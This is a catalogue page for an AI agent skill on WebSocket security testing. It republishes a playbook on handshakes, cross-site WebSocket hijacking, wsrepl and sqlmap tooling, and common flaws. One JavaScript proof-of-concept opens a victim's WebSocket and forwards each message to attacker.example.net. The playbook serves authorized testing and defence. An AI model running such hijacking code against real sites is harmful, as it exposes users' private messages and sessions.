Supabase Development and Debugging
supabase/agent-skills
General Supabase skill for database, auth, Edge Functions, Realtime and storage work, plus client libraries, migrations, security audits, debugging and reading logs.
WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws.
$ npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install langbyyi/CyberStrikeAI-SRC websocket-security --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/langbyyi/CyberStrikeAI-SRC.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/websocket-security .claude/skills/websocket-security && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "websocket-security" agent skill from https://github.com/langbyyi/CyberStrikeAI-SRC/tree/master/skills/websocket-security into .claude/skills/websocket-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "websocket-security", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/langbyyi/CyberStrikeAI-SRC/tree/master/skills/websocket-securityType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install langbyyi/CyberStrikeAI-SRC websocket-security --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/langbyyi/CyberStrikeAI-SRC.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/websocket-security .agents/skills/websocket-security && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "websocket-security" agent skill from https://github.com/langbyyi/CyberStrikeAI-SRC/tree/master/skills/websocket-security into .agents/skills/websocket-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "websocket-security", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install langbyyi/CyberStrikeAI-SRC websocket-security --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/langbyyi/CyberStrikeAI-SRC.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/websocket-security .cursor/skills/websocket-security && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "websocket-security" agent skill from https://github.com/langbyyi/CyberStrikeAI-SRC/tree/master/skills/websocket-security into .cursor/skills/websocket-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "websocket-security", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/langbyyi/CyberStrikeAI-SRC.git --path skills/websocket-security--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install langbyyi/CyberStrikeAI-SRC websocket-security --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/langbyyi/CyberStrikeAI-SRC.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/websocket-security .gemini/skills/websocket-security && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "websocket-security" agent skill from https://github.com/langbyyi/CyberStrikeAI-SRC/tree/master/skills/websocket-security into .gemini/skills/websocket-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "websocket-security", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install langbyyi/CyberStrikeAI-SRC websocket-securityInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/langbyyi/CyberStrikeAI-SRC.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/websocket-security .github/skills/websocket-security && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "websocket-security" agent skill from https://github.com/langbyyi/CyberStrikeAI-SRC/tree/master/skills/websocket-security into .github/skills/websocket-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "websocket-security", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install langbyyi/CyberStrikeAI-SRC websocket-security --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/langbyyi/CyberStrikeAI-SRC.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/websocket-security .opencode/skills/websocket-security && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "websocket-security" agent skill from https://github.com/langbyyi/CyberStrikeAI-SRC/tree/master/skills/websocket-security into .opencode/skills/websocket-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "websocket-security", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
websocket-securityWebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws.
Websocket Security is an agent skill from langbyyi/CyberStrikeAI-SRC. WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws. Use when apps use real-time channels, chat, notifications, or WS-backed APIs.
Its SKILL.md is about 1.8k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Backend & APIs, covering Realtime and WebSockets. The licence is Apache-2.0.
4 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit 166ee1c. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
pippythonFrom the folder's file list and the shell code blocks in SKILL.md.
No URLs in SKILL.md. Its commands use pip, which can reach the network depending on how they are called.
From URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Websocket Security loads about 1.8k tokens when it runs. Until then it costs about 45 tokens; SKILL.md has 735 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from langbyyi/CyberStrikeAI-SRC at commit 166ee1c, republished under its Apache-2.0 licence (© langbyyi). 735 words, ~1,825 tokens.
.claude/skills/websocket-security/SKILL.md (or your agent's skills folder).AI LOAD INSTRUCTION: This skill covers WebSocket protocol basics, cross-site WebSocket hijacking (CSWSH), practical tooling bridges, and common vulnerability classes. Apply only in authorized tests; treat tokens and message content as sensitive. For REST/GraphQL companion testing, cross-load api-security when present in the workspace.
| Signal | Probe | Why |
|---|---|---|
ws:// or wss:// endpoint found | Connect and send {"action":"ping"} | Confirm WebSocket is live and message format |
| Handshake does not validate Origin | Open WS from evil.com JS PoC | CSWSH — hijack victim's channel |
| Auth checked on handshake? | Connect with no cookies / invalid token | Missing auth = unauthenticated access |
| Message tampering | Modify JSON fields in WS frames | Server-side injection (SQLi, command injection) |
ws:// in production | Flag cleartext transport | MITM risk |
# Quick test — connect and probe WebSocket
wscat -c wss://target.example.com/wsDuring proxy or raw traffic review, watch for:
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
Sec-WebSocket-Protocol: optional-subprotocolServer success response indicators:
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=Routing hint: Filter for 101 and Upgrade: websocket in Burp/browser DevTools; for deep API testing, align authentication and authorization models with the api-security skill.
Upgrade: websocket and Connection: Upgrade — required upgrade handshake.Sec-WebSocket-Key — base64 nonce; server hashes with magic GUID and responds with Sec-WebSocket-Accept.Sec-WebSocket-Version: 13 — current standard version for browser interoperability.HTTP/1.1 101 Switching Protocols — handshake complete; subsequent frames are WebSocket binary/text frames per RFC.Minimal conceptual flow:
Client: HTTP GET + Upgrade headers
Server: 101 + Sec-WebSocket-Accept
Channel: framed messages (text/binary), ping/pong, closeOrigin (or equivalent binding) on the WebSocket handshake, andThen a malicious page loaded in the victim’s browser may open a WebSocket as the victim, similar in spirit to CSRF but for a persistent bidirectional channel.
const ws = new WebSocket('wss://vulnerable.example.com/messages');
ws.onopen = () => { ws.send('HELLO'); };
ws.onmessage = (event) => {
fetch('https://attacker.example.net/?' + encodeURIComponent(event.data));
};Testing notes: Confirm whether Origin is checked, whether cookies are sent (SameSite rules), and whether subprotocol or custom headers are required—missing checks increase CSWSH risk.
pip install wsrepl
wsrepl -u wss://target.example.com/ws -P auth_plugin.pyUse a plugin to reproduce browser cookies, headers, or token refresh during the WebSocket lifecycle.
python ws-harness.py -u "ws://127.0.0.1:8765/path" -m ./message.txtExample downstream use with SQL injection tooling over the bridged HTTP surface (adjust URL to local listener):
sqlmap -u "http://127.0.0.1:8000/?fuzz=test" --batch| Issue | Why it matters |
|---|---|
Missing Origin validation | Enables CSWSH from attacker-controlled pages |
Auth token in URL (wss://host/ws?token=...) | Logs, proxies, Referer leakage, browser history |
| No rate limiting on messages | Abuse, brute force, DoS |
ws:// instead of wss:// | Cleartext on the wire (MITM) |
| Injection in message bodies | SQLi, command injection, or XSS if content is stored/reflected elsewhere |
Example sensitive URL anti-pattern:
wss://api.example.com/stream?access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...Prefer Sec-WebSocket-Protocol, first-message auth, or cookie + CSRF token patterns aligned with product constraints.
101 responses; note wss vs ws.Origin, Host, and Cookie policies correct? Any token in query string?ws:// in production; verify TLS and HSTS alignment.wss:// (not ws://) in productionUse visible http-framework-test for handshake/header checks and execute-python-script or exec for a scoped WebSocket client when frame-level replay is required. Browser/proxy inspection is optional and only applies when the capability is visible; do not assume a repeater MCP exists.
Note: WebSocket often shares session and authorization models with REST; align with api-security for the same backend's authentication and resource boundaries.
© langbyyi, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/websocket-security of langbyyi/CyberStrikeAI-SRC.
Open the folder on GitHubat commit 166ee1c
We found 1 copy of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in langbyyi/CyberStrikeAI-SRC, which our catalogue first saw on October 7, 2026.
Websocket Security next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Websocket Security this skilllangbyyi/CyberStrikeAI-SRC | 135 | 1 repos | ~1.8k | Automated safety check: Pass | Apache-2.0 | |
| Supabase Development and Debuggingsupabase/agent-skills | 2.7k | 3 repos | ~3.6k | Automated safety check: Pass | MIT | |
| Use Yaakmountain-loop/yaak | 19k | — | ~1.9k | Automated safety check: Pass | MIT | |
| Gemini Live API Devgoogle-gemini/gemini-skills | 4.3k | — | ~4.6k | Automated safety check: Pass | Apache-2.0 | |
| Broker Integrationmarketcalls/openalgo | 2.8k | — | ~4.7k | Automated safety check: Notes | AGPL-3.0 | |
| Trigger.dev Realtimepapermark/papermark | 9.2k | — | ~1.7k | Automated safety check: Pass | Custom licence |
supabase/agent-skills
General Supabase skill for database, auth, Edge Functions, Realtime and storage work, plus client libraries, migrations, security audits, debugging and reading logs.
mountain-loop/yaak
A skill your agent uses when the user mentions Yaak, a Yaak workspace, or the yaak command, or asks to call, hit, or smoke test HTTP/REST endpoints, save or organize API requests for reuse or manual…
google-gemini/gemini-skills
A skill your agent uses when building real-time, bidirectional streaming applications with the Gemini Live API, or migrating legacy Live models (2.0/2.5/3.1) to Gemini 3.8 Live.
marketcalls/openalgo
Integrate a new Indian broker into OpenAlgo, or modify an existing broker plugin.
papermark/papermark
Shows how to subscribe to Trigger.dev task runs from the backend and from React for progress indicators, live dashboards, AI response streams and approval waits.
aoyunyang/spider-king-skill
Pure-web protocol reverse skill: turn hostile browser clients into browser-free Python collectors.
langbyyi/CyberStrikeAI-SRC
Automate low-impact web vulnerability verification through Burp MCP.
langbyyi/CyberStrikeAI-SRC
Authentication bypass testing playbook. An agent skill from langbyyi/CyberStrikeAI-SRC.
langbyyi/CyberStrikeAI-SRC
HTTP Parameter Pollution (HPP): duplicate query/body keys parsed differently by servers, proxies, WAFs, and app frameworks.
langbyyi/CyberStrikeAI-SRC
Source control and artifact exposure (.git, .svn, .hg, backups, .env).
langbyyi/CyberStrikeAI-SRC
PHP type juggling and weak comparison (==) bypass. An agent skill from langbyyi/CyberStrikeAI-SRC.
langbyyi/CyberStrikeAI-SRC
XSLT injection testing: processor fingerprinting, XXE and document() SSRF, EXSLT write primitives, PHP/Java/.NET extension RCE surfaces.
Categories
WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws. Websocket Security is an agent skill from langbyyi/CyberStrikeAI-SRC. WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws.
Websocket Security fits situations like: apps use real-time channels; tasks that involve Realtime and WebSockets.
Run `npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a claude-code`. Or copy the skill folder (skills/websocket-security in langbyyi/CyberStrikeAI-SRC) into .claude/skills/websocket-security in your project. Claude Code loads it when a task matches its description.
Run `npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a codex`. Or copy the skill folder (skills/websocket-security in langbyyi/CyberStrikeAI-SRC) into .agents/skills/websocket-security in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/websocket-security, .gemini/skills/websocket-security, .github/skills/websocket-security and .opencode/skills/websocket-security in your project.
Going by SKILL.md and its folder, Websocket Security needs the command-line tools its instructions call (pip and python). Our summary lists: Python 3.
SKILL.md contains no URLs. Its commands use pip, which can reach the network depending on how they are called. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Websocket Security is published under the Apache-2.0 licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 1.8k tokens (SKILL.md is roughly 7.3k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Websocket Security: Supabase Development and Debugging (supabase/agent-skills, 2.7k stars), Use Yaak (mountain-loop/yaak, 19k stars), Gemini Live API Dev (google-gemini/gemini-skills, 4.3k stars) and Broker Integration (marketcalls/openalgo, 2.8k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
langbyyi (a GitHub user) maintains it in langbyyi/CyberStrikeAI-SRC, which has 135 GitHub stars. The repository holds 13 skills in this directory. The repository was last updated on October 7, 2026.
Source: langbyyi/CyberStrikeAI-SRC on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.